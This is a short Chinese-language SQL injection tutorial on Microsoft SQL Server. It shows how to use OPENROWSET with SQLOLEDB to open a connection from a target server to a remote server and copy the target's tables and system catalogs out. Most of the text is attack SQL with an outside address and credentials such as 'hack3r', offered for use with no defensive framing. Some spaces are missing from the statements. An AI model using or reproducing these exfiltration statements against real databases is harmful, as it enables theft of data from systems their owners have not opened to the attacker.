非常经典的Ms Sql注射资料

核心提示： 参数:(1)OLEDBProvidername2、其中连接字符串参数可以是任何和端口用来连接,比如select*fromOPENROWSET('SQLOLEDB','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202

参数:(1)OLEDBProvidername

2、其中连接字符串参数可以是任何和端口用来连接,比如

select*fromOPENROWSET('SQLOLEDB','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select*fromtable'

要复制目标主机的整个数据库，首先要在目标主机上和自己机器上的数据库建立连接(如何在目标主机上建立远程连接，刚才已经讲了),之后insert所有远程表到本地表。

基本语法：

insertintoOPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=apachy_123','select*fromtable1')select*fromtable2

这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口，指向需要的地方，比如：

insertintoOPENROWSET('SQLOLEDB','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select*fromtable1')select*fromtable2
insertintoOPENROWSET('SQLOLEDB','uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;','select*from_sysdatabases')
select*frommaster.dbo.sysdatabases
insertintoOPENROWSET('SQLOLEDB','uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;','select*from_sysobjects')
select*fromuser_database.dbo.sysobjects
insertintoOPENROWSET('SQLOLEDB','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select*from_syscolumns')
select*fromuser_database.dbo.syscolumns